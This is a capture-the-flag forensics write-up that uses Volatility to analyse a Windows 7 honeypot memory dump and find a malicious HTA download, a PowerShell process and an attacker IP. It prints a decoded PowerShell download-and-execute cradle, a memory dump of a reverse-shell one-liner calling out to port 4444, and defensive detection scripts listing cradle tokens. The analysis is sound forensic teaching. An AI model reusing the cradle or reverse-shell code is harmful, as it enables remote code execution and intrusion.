
Day 2: Honeypot

Challenge description
Santa really encourages people to be on his good list, but sometimes he is a bit naughty himself.
He is using a Windows 7 honeypot to capture any suspicious action. Since he is not a forensics
expert, can you help him identify any indications of compromise?

1. Find the full URL used to download the malware.
2. Find the malicious process's ID.
3. Find the attacker's IP.

Flag Format: HTB{echo -n "http://url.com/path.foo_PID_127.0.0.1" | md5sum}

For this challenge, we are provided with a raw image. Since the description says it is a Windows 7 machine, this is most likely a memory dump, which we can inspect with Volatility.

For this challenge, I have used Volatility 2.

Enumeration

Basic enumeration of the memory dump reveals some details about it.

┌──(root💀kali)-[/home/kali/Desktop/volatility_2.6_lin64_standalone]
> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw imageinfo
Volatility Foundation Volatility Framework 2.6
INFO : volatility.debug : Determining profile based on KDBG search...
Suggested Profile(s) : Win7SP1x86_23418, Win7SP0x86, Win7SP1x86
AS Layer1 : IA32PagedMemoryPae (Kernel AS)
AS Layer2 : FileAddressSpace (/media/sf_HTBShared/honeypot.raw)
PAE type : PAE
DTB : 0x185000L
KDBG : 0x82930c68L
Number of Processors : 1
Image Type (Service Pack) : 1
KPCR for CPU 0 : 0x82931d00L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2021-11-25 19:14:12 UTC+0000
Image local date and time : 2021-11-25 11:14:12 -0800

Well, it is indeed a Windows 7 machine. Let's try the usual suite of commands.

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 pstree
Volatility Foundation Volatility Framework 2.6
Name Pid PPid Thds Hnds Time
-------------------------------------------------- ------ ------ ------ ------ ----
0x8413a940:System 4 0 76 549 2021-11-26 05:12:15 UTC+0000
. 0x84fe9c80:smss.exe 236 4 2 32 2021-11-26 05:12:15 UTC+0000
0x84f9bd28:csrss.exe 308 300 9 435 2021-11-26 05:12:16 UTC+0000
. 0x858f2bc0:conhost.exe 1684 308 2 32 2021-11-25 19:12:21 UTC+0000
0x850ba3f0:wininit.exe 348 300 3 75 2021-11-26 05:12:16 UTC+0000
. 0x856f5620:services.exe 400 348 8 225 2021-11-26 05:12:16 UTC+0000
.. 0x85c7e610:svchost.exe 2080 400 5 91 2021-11-25 19:12:22 UTC+0000
.. 0x85c54030:sppsvc.exe 1800 400 5 146 2021-11-25 19:12:22 UTC+0000
.. 0x859eaa60:vmicsvc.exe 1432 400 4 66 2021-11-25 19:12:19 UTC+0000
.. 0x85a25758:vmicsvc.exe 1540 400 6 81 2021-11-25 19:12:19 UTC+0000
.. 0x85d84b00:taskhost.exe 2784 400 11 172 2021-11-25 19:12:37 UTC+0000
.. 0x85bf9b00:wlms.exe 1956 400 4 45 2021-11-25 19:12:20 UTC+0000
.. 0x85969b00:spoolsv.exe 1208 400 14 293 2021-11-25 19:12:19 UTC+0000
.. 0x924cd3a8:svchost.exe 692 400 7 268 2021-11-25 19:12:18 UTC+0000
.. 0x858326b8:svchost.exe 572 400 11 368 2021-11-26 05:12:17 UTC+0000
... 0x84b88788:WmiPrvSE.exe 3112 572 8 119 2021-11-25 19:13:24 UTC+0000
... 0x84ada2d0:dllhost.exe 168 572 6 88 2021-11-25 19:14:13 UTC+0000
.. 0x85921030:svchost.exe 1012 400 17 331 2021-11-25 19:12:19 UTC+0000
.. 0x859ec4b8:taskhost.exe 1440 400 10 148 2021-11-25 19:12:19 UTC+0000
.. 0x858ed9d8:svchost.exe 848 400 21 464 2021-11-25 19:12:19 UTC+0000
... 0x85d8f488:dwm.exe 2844 848 5 89 2021-11-25 19:12:37 UTC+0000
... 0x85a13c60:dwm.exe 1532 848 5 85 2021-11-25 19:12:19 UTC+0000
.. 0x85d01d28:SearchIndexer. 2360 400 17 730 2021-11-25 19:12:26 UTC+0000
... 0x85d3a260:SearchFilterHo 2460 2360 6 95 2021-11-25 19:12:26 UTC+0000
... 0x85d36d28:SearchProtocol 2440 2360 8 328 2021-11-25 19:12:26 UTC+0000
.. 0x85a42030:svchost.exe 1620 400 14 276 2021-11-25 19:12:19 UTC+0000
.. 0x859d7488:vmicsvc.exe 1376 400 8 103 2021-11-25 19:12:19 UTC+0000
.. 0x841e6470:cygrunsrv.exe 1872 400 6 100 2021-11-25 19:12:20 UTC+0000
... 0x858cad28:cygrunsrv.exe 1612 1872 0 ------ 2021-11-25 19:12:21 UTC+0000
.... 0x858d5d28:sshd.exe 1676 1612 4 100 2021-11-25 19:12:21 UTC+0000
.. 0x859ae030:svchost.exe 1252 400 20 324 2021-11-25 19:12:19 UTC+0000
.. 0x8593c260:svchost.exe 1084 400 16 396 2021-11-25 19:12:19 UTC+0000
.. 0x85819700:svchost.exe 744 400 17 353 2021-11-25 19:12:18 UTC+0000
.. 0x859de428:vmicsvc.exe 1396 400 7 108 2021-11-25 19:12:19 UTC+0000
.. 0x859f88b8:vmicsvc.exe 1504 400 5 80 2021-11-25 19:12:19 UTC+0000
.. 0x858f8548:svchost.exe 888 400 41 902 2021-11-25 19:12:19 UTC+0000
.. 0x85899390:VBoxService.ex 636 400 14 123 2021-11-26 05:12:17 UTC+0000
. 0x85702590:lsass.exe 408 348 7 615 2021-11-26 05:12:16 UTC+0000
. 0x856fbd28:lsm.exe 416 348 10 171 2021-11-26 05:12:16 UTC+0000
0x85d91498:explorer.exe 2856 2836 27 700 2021-11-25 19:12:38 UTC+0000
. 0x84bee280:DumpIt.exe 2924 2856 2 37 2021-11-25 19:14:10 UTC+0000
. 0x84b3ed28:VBoxTray.exe 3504 2856 15 145 2021-11-25 19:12:46 UTC+0000
. 0x84bafc60:iexplore.exe 3324 2856 18 434 2021-11-25 19:13:31 UTC+0000
.. 0x856aa9b8:iexplore.exe 3344 3324 26 641 2021-11-25 19:13:31 UTC+0000
. 0x85dacd28:regsvr32.exe 3108 2856 0 ------ 2021-11-25 19:12:38 UTC+0000
0x8420dd28:powershell.exe 2700 3720 13 444 2021-11-25 19:13:50 UTC+0000
. 0x85d8db00:whoami.exe 4028 2700 0 ------ 2021-11-25 19:14:01 UTC+0000
. 0x84289030:HOSTNAME.EXE 4036 2700 0 ------ 2021-11-25 19:14:01 UTC+0000
0x85a1ab00:explorer.exe 1556 1512 25 587 2021-11-25 19:12:19 UTC+0000
. 0x85a6d6f8:VBoxTray.exe 1716 1556 16 147 2021-11-25 19:12:20 UTC+0000
0x85873728:winlogon.exe 2644 2604 6 119 2021-11-25 19:12:33 UTC+0000
0x85d16d28:csrss.exe 2616 2604 11 291 2021-11-25 19:12:33 UTC+0000
. 0x851733c8:conhost.exe 3732 2616 2 50 2021-11-25 19:13:50 UTC+0000
. 0x84b046c0:conhost.exe 2920 2616 2 50 2021-11-25 19:14:10 UTC+0000
0x859f4398:csrss.exe 360 340 7 159 2021-11-26 05:12:16 UTC+0000
0x85147d28:winlogon.exe 496 340 4 111 2021-11-26 05:12:17 UTC+0000

Hmmm... The processes that stand out are iexplore.exe and powershell.exe. Let's start with iexplore.exe. Luckily, Volatility has a neat plugin (iehistory) for pulling Internet Explorer history out of memory!

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 iehistory

[Screenshot: iehistory output showing the download of christmas_update.hta from windowsliveupdater.com]

Ooh! A file being downloaded as an "update"? Sounds suspicious. .hta files (HTML Applications) are also a common vector for abusing Internet Explorer to launch PowerShell scripts.

While we could dump the memory of the powershell.exe process, let's first look at the command line it was started with.

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 cmdline

[Screenshot: cmdline output showing powershell.exe (PID 2700) launched with a base64-encoded command]

Looks suspicious: the argument is a base64-encoded command. We can decode it. Note that PowerShell's -EncodedCommand is base64 over UTF-16LE, so a plain `base64 -d` emits a NUL byte after every character; the terminal simply does not display them.

┌──(root💀kali)-[/home/kali/Desktop/volatility_2.6_lin64_standalone]
└─# echo aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQAZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA== | base64 -d
iex ((new-object net.webclient).downloadstring('https://windowsliveupdater.com/update.ps1'))

Well. Now it's confirmed that the PowerShell process is a downloader that fetches even more stuff (update.ps1) with a download-and-execute cradle. Its PID, 2700 from the pstree output, is part 2 of the flag.

The PowerShell script presumably connects back to a C2 server. Let's verify that with netscan.
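The decoding step above, as an added example that is not part of the original write-up: it decodes a PowerShell -EncodedCommand blob correctly (base64 over UTF-16LE), pulls out any URLs, and flags download-and-execute cradle tokens. The encoded string is the one from this page; the surrounding switches in SAMPLE_CMDLINE (-nop -w hidden -e) are an assumed, constructed command line.

```python
import base64
import re
from typing import Optional

# Encoded command as recovered from the powershell.exe (PID 2700) command line on this page.
PAGE_ENCODED = (
    "aQBlAHgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIA"
    "YwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcA"
    "aAB0AHQAcABzADoALwAvAHcAaQBuAGQAbwB3AHMAbABpAHYAZQB1AHAAZABhAHQA"
    "ZQByAC4AYwBvAG0ALwB1AHAAZABhAHQAZQAuAHAAcwAxACcAKQApAA=="
)
# Constructed command line in the shape the cmdline plugin prints; the switches are assumed.
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -e " + PAGE_ENCODED

# Tokens typical of download-and-execute cradles.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "net.webclient", "frombase64string")
URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)
# Matches -e, -ec, -enc and -encodedcommand (PowerShell accepts any unambiguous prefix).
ENC_ARG_RE = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over UTF-16LE; `base64 -d` alone leaves NUL bytes between characters."""
    raw = base64.b64decode(blob, validate=True)
    return raw.decode("utf-16-le").rstrip("\x00")


def find_encoded_arg(cmdline: str) -> Optional[str]:
    m = ENC_ARG_RE.search(cmdline)
    return m.group(1) if m else None


def triage(cmdline: str) -> dict:
    """Decode an encoded command if present, then extract URLs and cradle indicators from it."""
    blob = find_encoded_arg(cmdline)
    text = decode_encoded_command(blob) if blob else cmdline
    return {
        "encoded": blob is not None,
        "decoded": text,
        "urls": URL_RE.findall(text),
        "indicators": [t for t in INDICATORS if t in text.lower()],
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINE).items():
        print(f"{key}: {value}")
```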

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 netscan
Volatility Foundation Volatility Framework 2.6
Offset(P) Proto Local Address Foreign Address State Pid Owner Created
0x23d04218 TCPv4 0.0.0.0:49155 0.0.0.0:0 LISTENING 400 services.exe
0x23d04218 TCPv6 :::49155 :::0 LISTENING 400 services.exe
0x2554b460 TCPv4 10.0.2.15:49226 93.184.220.29:80 ESTABLISHED -1
0x261e9d30 TCPv4 10.0.2.15:49228 172.67.177.22:443 ESTABLISHED -1
0x3e22f008 UDPv4 0.0.0.0:0 *:* 2080 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e22f008 UDPv6 :::0 *:* 2080 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e24c588 UDPv4 0.0.0.0:0 *:* 2080 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e281368 UDPv4 10.0.2.15:138 *:* 4 System 2021-11-25 19:12:23 UTC+0000
0x3e2a29b8 UDPv4 0.0.0.0:0 *:* 1084 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e2a29b8 UDPv6 :::0 *:* 1084 svchost.exe 2021-11-25 19:12:23 UTC+0000
0x3e2a6448 UDPv4 0.0.0.0:5355 *:* 1084 svchost.exe 2021-11-25 19:12:26 UTC+0000
0x3e354618 UDPv6 fe80::256b:4013:4140:453f:546 *:* 744 svchost.exe 2021-11-25 19:12:31 UTC+0000
0x3e3b0c70 UDPv4 0.0.0.0:0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3e5e4f50 UDPv4 0.0.0.0:5355 *:* 1084 svchost.exe 2021-11-25 19:12:26 UTC+0000
0x3e5e4f50 UDPv6 :::5355 *:* 1084 svchost.exe 2021-11-25 19:12:26 UTC+0000
0x3e630008 UDPv4 0.0.0.0:0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3e630008 UDPv6 :::0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3e238300 TCPv4 0.0.0.0:445 0.0.0.0:0 LISTENING 4 System
0x3e238300 TCPv6 :::445 :::0 LISTENING 4 System
0x3e2b5b88 TCPv4 10.0.2.15:139 0.0.0.0:0 LISTENING 4 System
0x3e5f77a0 TCPv4 0.0.0.0:22 0.0.0.0:0 LISTENING 1676 sshd.exe
0x3e619578 TCPv4 0.0.0.0:49152 0.0.0.0:0 LISTENING 348 wininit.exe
0x3e619578 TCPv6 :::49152 :::0 LISTENING 348 wininit.exe
0x3e619cc0 TCPv4 0.0.0.0:49152 0.0.0.0:0 LISTENING 348 wininit.exe
0x3e630a20 TCPv4 0.0.0.0:49156 0.0.0.0:0 LISTENING 408 lsass.exe
0x3e630a20 TCPv6 :::49156 :::0 LISTENING 408 lsass.exe
0x3e648508 TCPv4 0.0.0.0:49153 0.0.0.0:0 LISTENING 744 svchost.exe
0x3e648508 TCPv6 :::49153 :::0 LISTENING 744 svchost.exe
0x3e6b92c0 TCPv4 0.0.0.0:135 0.0.0.0:0 LISTENING 692 svchost.exe
0x3e6b92c0 TCPv6 :::135 :::0 LISTENING 692 svchost.exe
0x3e6b9910 TCPv4 0.0.0.0:135 0.0.0.0:0 LISTENING 692 svchost.exe
0x3e6f0bd8 TCPv4 0.0.0.0:49153 0.0.0.0:0 LISTENING 744 svchost.exe
0x3e75f8e0 TCPv4 0.0.0.0:49154 0.0.0.0:0 LISTENING 888 svchost.exe
0x3e762a40 TCPv4 0.0.0.0:49155 0.0.0.0:0 LISTENING 400 services.exe
0x3e7686e8 TCPv4 0.0.0.0:49154 0.0.0.0:0 LISTENING 888 svchost.exe
0x3e7686e8 TCPv6 :::49154 :::0 LISTENING 888 svchost.exe
0x3e2e9cc0 TCPv4 10.0.2.15:49221 212.205.126.106:443 ESTABLISHED -1
0x3ed036c8 UDPv4 10.0.2.15:137 *:* 4 System 2021-11-25 19:12:23 UTC+0000
0x3e8611f0 TCPv4 0.0.0.0:22 0.0.0.0:0 LISTENING 1676 sshd.exe
0x3e8611f0 TCPv6 :::22 :::0 LISTENING 1676 sshd.exe
0x3e9be828 TCPv4 0.0.0.0:49156 0.0.0.0:0 LISTENING 408 lsass.exe
0x3ee98d80 TCPv4 10.0.2.15:49229 147.182.172.189:4444 ESTABLISHED -1
0x3f1b0df8 TCPv4 10.0.2.15:49216 212.205.126.106:443 ESTABLISHED -1
0x3f2cff50 UDPv4 0.0.0.0:0 *:* 261576 ?? 2021-11-25 19:13:04 UTC+0000
0x3f2cff50 UDPv6 :::0 *:* 261576 ?? 2021-11-25 19:13:04 UTC+0000
0x3f4d7378 UDPv4 0.0.0.0:0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3f4dad28 UDPv4 127.0.0.1:58426 *:* 3344 iexplore.exe 2021-11-25 19:13:31 UTC+0000
0x3f520ab8 UDPv4 0.0.0.0:0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3f520ab8 UDPv6 :::0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3f546de8 UDPv4 0.0.0.0:0 *:* 636 VBoxService.ex 2021-11-25 19:14:14 UTC+0000
0x3f225df8 TCPv4 10.0.2.15:49222 212.205.126.106:443 ESTABLISHED -1
0x3f547008 TCPv4 10.0.2.15:49220 212.205.126.106:443 ESTABLISHED -1
0x3f561438 TCPv4 10.0.2.15:49215 204.79.197.203:443 ESTABLISHED -1
0x3f57c438 TCPv4 10.0.2.15:49218 95.100.210.141:443 ESTABLISHED -1
0x3f58b4c8 TCPv4 10.0.2.15:49217 212.205.126.106:443 ESTABLISHED -1
0x3f58c748 TCPv4 10.0.2.15:49223 212.205.126.106:443 ESTABLISHED -1
0x3f58e9d8 TCPv4 10.0.2.15:49225 172.67.177.22:443 ESTABLISHED -1
0x3f5c6df8 TCPv4 10.0.2.15:49219 95.100.210.141:443 ESTABLISHED -1

Port 4444? An established connection to 147.182.172.189 on a non-standard port, with no owning process resolved (Pid -1), looks like the attacker's IP and port. Let's confirm by scanning memory for that address with yarascan.
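The triage of the netscan output above, as an added example that is not part of the original write-up: it parses Volatility 2 netscan rows (TCP rows carry a State column, UDP rows do not) and ranks ESTABLISHED sockets by how many warning signs they show. The sample rows are copied from the output above; the set of "expected" remote ports is an assumption.

```python
from typing import Dict, List

# Excerpt of the netscan output above (constructed sample, values copied from the page).
NETSCAN_SAMPLE = """\
0x23d04218 TCPv4 0.0.0.0:49155 0.0.0.0:0 LISTENING 400 services.exe
0x2554b460 TCPv4 10.0.2.15:49226 93.184.220.29:80 ESTABLISHED -1
0x261e9d30 TCPv4 10.0.2.15:49228 172.67.177.22:443 ESTABLISHED -1
0x3e3b0c70 UDPv4 0.0.0.0:0 *:* 2700 powershell.exe 2021-11-25 19:13:51 UTC+0000
0x3e5f77a0 TCPv4 0.0.0.0:22 0.0.0.0:0 LISTENING 1676 sshd.exe
0x3ee98d80 TCPv4 10.0.2.15:49229 147.182.172.189:4444 ESTABLISHED -1
0x3f561438 TCPv4 10.0.2.15:49215 204.79.197.203:443 ESTABLISHED -1
"""
# Remote ports considered ordinary for outbound traffic from a workstation (assumption).
EXPECTED_REMOTE_PORTS = {22, 53, 80, 443}


def parse_netscan(text: str) -> List[Dict]:
    """Parse Volatility 2 netscan rows; TCP rows have a State column, UDP rows do not."""
    rows = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 5 or not f[0].startswith("0x"):
            continue  # banner or header line
        is_tcp = f[1].startswith("TCP")
        i = 5 if is_tcp else 4  # index of the Pid column
        rows.append({"proto": f[1], "local": f[2], "remote": f[3],
                     "state": f[4] if is_tcp else None, "pid": int(f[i]),
                     "owner": f[i + 1] if len(f) > i + 1 else None})
    return rows


def suspicious_connections(rows: List[Dict]) -> List[Dict]:
    """Flag ESTABLISHED sockets on unexpected remote ports or with no resolved owner (Pid -1)."""
    findings = []
    for r in rows:
        if r["state"] != "ESTABLISHED":
            continue
        port = int(r["remote"].rsplit(":", 1)[1])
        reasons = []
        if port not in EXPECTED_REMOTE_PORTS:
            reasons.append(f"unexpected remote port {port}")
        if r["pid"] == -1:
            reasons.append("owning process not resolved")
        if reasons:
            findings.append({**r, "reasons": reasons})
    findings.sort(key=lambda x: -len(x["reasons"]))  # strongest signal first
    return findings
```

On the full output above every ESTABLISHED row has Pid -1, so the remote port is what separates the 4444 connection from ordinary HTTPS traffic.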

> ./volatility_2.6_lin64_standalone -f /media/sf_HTBShared/honeypot.raw --profile=Win7SP1x86_23418 yarascan -Y "147.182.172.189"
Volatility Foundation Volatility Framework 2.6
Rule: r1
Owner: Process powershell.exe Pid 2700
0x01ed23cb 31 34 37 2e 31 38 32 2e 31 37 32 2e 31 38 39 27 147.182.172.189'
0x01ed23db 2c 34 34 34 34 29 3b 24 73 74 72 65 61 6d 20 3d ,4444);$stream.=
0x01ed23eb 20 24 63 6c 69 65 6e 74 2e 47 65 74 53 74 72 65 .$client.GetStre
0x01ed23fb 61 6d 28 29 3b 5b 62 79 74 65 5b 5d 5d 24 62 79 am();[byte[]]$by
0x01ed240b 74 65 73 20 3d 20 30 2e 2e 36 35 35 33 35 7c 25 tes.=.0..65535|%
0x01ed241b 7b 30 7d 3b 77 68 69 6c 65 28 28 24 69 20 3d 20 {0};while(($i.=.
0x01ed242b 24 73 74 72 65 61 6d 2e 52 65 61 64 28 24 62 79 $stream.Read($by
0x01ed243b 74 65 73 2c 20 30 2c 20 24 62 79 74 65 73 2e 4c tes,.0,.$bytes.L
0x01ed244b 65 6e 67 74 68 29 29 20 2d 6e 65 20 30 29 7b 3b ength)).-ne.0){;
0x01ed245b 24 64 61 74 61 20 3d 20 28 4e 65 77 2d 4f 62 6a $data.=.(New-Obj
0x01ed246b 65 63 74 20 2d 54 79 70 65 4e 61 6d 65 20 53 79 ect.-TypeName.Sy
0x01ed247b 73 74 65 6d 2e 54 65 78 74 2e 41 53 43 49 49 45 stem.Text.ASCIIE
0x01ed248b 6e 63 6f 64 69 6e 67 29 2e 47 65 74 53 74 72 69 ncoding).GetStri
0x01ed249b 6e 67 28 24 62 79 74 65 73 2c 30 2c 20 24 69 29 ng($bytes,0,.$i)
0x01ed24ab 3b 24 73 65 6e 64 62 61 63 6b 20 3d 20 28 69 65 ;$sendback.=.(ie
0x01ed24bb 78 20 24 64 61 74 61 20 32 3e 26 31 20 7c 20 4f x.$data.2>&1.|.O

Bingo! The IP and port sit in the memory of powershell.exe (PID 2700) as part of a reverse-shell one-liner (a TCP client whose stream is read and passed to iex). Now we piece everything together and submit the flag.

echo -n "https://windowsliveupdater.com/christmas_update.hta_2700_147.182.172.189" | md5sum

Flag

HTB{969b934d7396d043a50a37b70e1e010a}